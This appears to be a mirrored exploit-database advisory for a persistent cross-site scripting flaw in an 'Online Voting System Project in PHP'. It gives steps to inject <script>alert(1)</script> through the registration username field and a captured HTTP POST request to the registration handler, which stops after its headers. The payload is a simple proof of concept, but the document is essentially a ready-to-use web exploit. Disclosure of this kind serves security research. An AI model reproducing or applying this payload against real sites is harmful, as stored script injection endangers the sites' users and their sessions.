Online Voting System Project in PHP – ‘username’ Persistent Cross-Site Scripting

  • 作者: Sagar Banwa
    日期: 2020-12-02
  • 类别:
  • 来源:
  • # Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
    # Date: 27-11-2020
    # Exploit Author: Sagar Banwa
    # Vendor Homepage:
    # Software Link:
    # Tested on: Windows 10/Kali Linux
    1. Go to register 
    2. Add the payload in Username : <script>alert(1)</script>
    3. And complete the register 
    4. Login to the account 
    POST /vote/reg_action.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 593
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/vote/register.php
    Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep
    Upgrade-Insecure-Requests: 1